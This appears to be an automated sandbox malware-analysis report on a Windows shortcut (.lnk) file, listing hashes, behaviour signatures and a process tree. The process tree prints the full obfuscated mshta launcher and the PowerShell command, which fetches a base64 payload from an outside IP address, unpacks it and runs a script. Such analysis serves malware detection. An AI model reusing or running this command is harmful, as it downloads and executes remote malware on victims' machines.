Overview

overview

8

Static

static

1

41cf6298a4...29.lnk

windows7-x64

8

41cf6298a4...29.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17/09/2024, 01:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk

  • Size

    2KB

  • MD5

    37fb639a295daa760c739bc21c553406

  • SHA1

    50e4d8a112e4aad2c984d22f83c80c8723f232da

  • SHA256

    41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

  • SHA512

    28d67d4d788f301590164f28d38dd2aa73e4669eb6886e7536bec47aea08f2c27c3a507ac1636d907735f644d5e67184f420fd1e556629e10b83c8d338ef159a

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject('WScr"+"ipt.Shell');a.Run(c,0,0);close();";a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181';$p='8014';$r="+n+"IO."+s+"Reader(("+n+"Net.Sockets.TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLine();$b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip';Set-Content"+t+"V $b -Encoding Byte;Expand-Archive"+t+"D "+d+";del $t;$v='"+d+"\\s.vbs';&$v;sc "+d+"\\nt91610 81";eval(w);
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $r='64.49.14.181';$p='8014';$r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream());$z=$r.ReadLine();$b=[Convert]::FromBase64String($z);$t='c:\programdata\t.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Path $t -D c:\programdata;del $t;$v='c:\programdata\s.vbs';&$v;sc c:\programdata\nt91610 81
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2764

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2764-41-0x0000000002480000-0x0000000002488000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2764-40-0x000000001B320000-0x000000001B602000-memory.dmp

    Filesize

    2.9MB

    Download